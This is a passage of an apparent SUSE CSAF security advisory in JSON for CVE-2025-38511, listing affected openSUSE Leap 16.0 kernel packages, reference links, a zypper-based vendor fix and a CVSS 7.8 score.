"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38511",
"url": "https://www.suse.com/security/cve/CVE-2025-38511"
},
{
"category": "external",
"summary": "SUSE Bug 1248175 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248175"
},
{
"category": "external",
"summary": "SUSE Bug 1248176 for CVE-2025-38511",
"url": "https://bugzilla.suse.com/1248176"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
